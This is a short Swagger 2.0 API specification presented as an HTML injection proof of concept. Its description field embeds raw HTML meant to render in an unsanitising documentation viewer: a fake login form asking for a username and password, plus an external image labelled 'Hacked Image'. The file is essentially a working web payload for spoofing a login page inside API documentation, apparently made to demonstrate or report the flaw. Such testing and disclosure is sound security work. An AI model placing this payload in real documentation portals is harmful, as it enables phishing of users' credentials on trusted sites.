swagger: "2.0"
info:
  title: "HTML Injection: Fake Login PoC"
  version: "1.0.0"
  description: |
    <h2>⚠️ Fake Login Page</h2>
    <form style="display:flex; flex-direction:column; width:300px;">
      <label>👤 Username</label><input type="text" style="margin-bottom:10px;" />
      <label>🔒 Password</label><input type="password" style="margin-bottom:10px;" />
      <button type="submit">Login</button>
    </form>
    <br>
    <img src="https://i.imgur.com/nYGlIHs.jpeg" width="800" height="600" alt="Hacked Image" />
host: example.com
schemes:
  - https
paths:
  /test:
    get:
      summary: "Fake Login Test"
      description: "This endpoint renders a fake login page using HTML Injection PoC."
      responses:
        '200':
          description: "Returns a successful response"
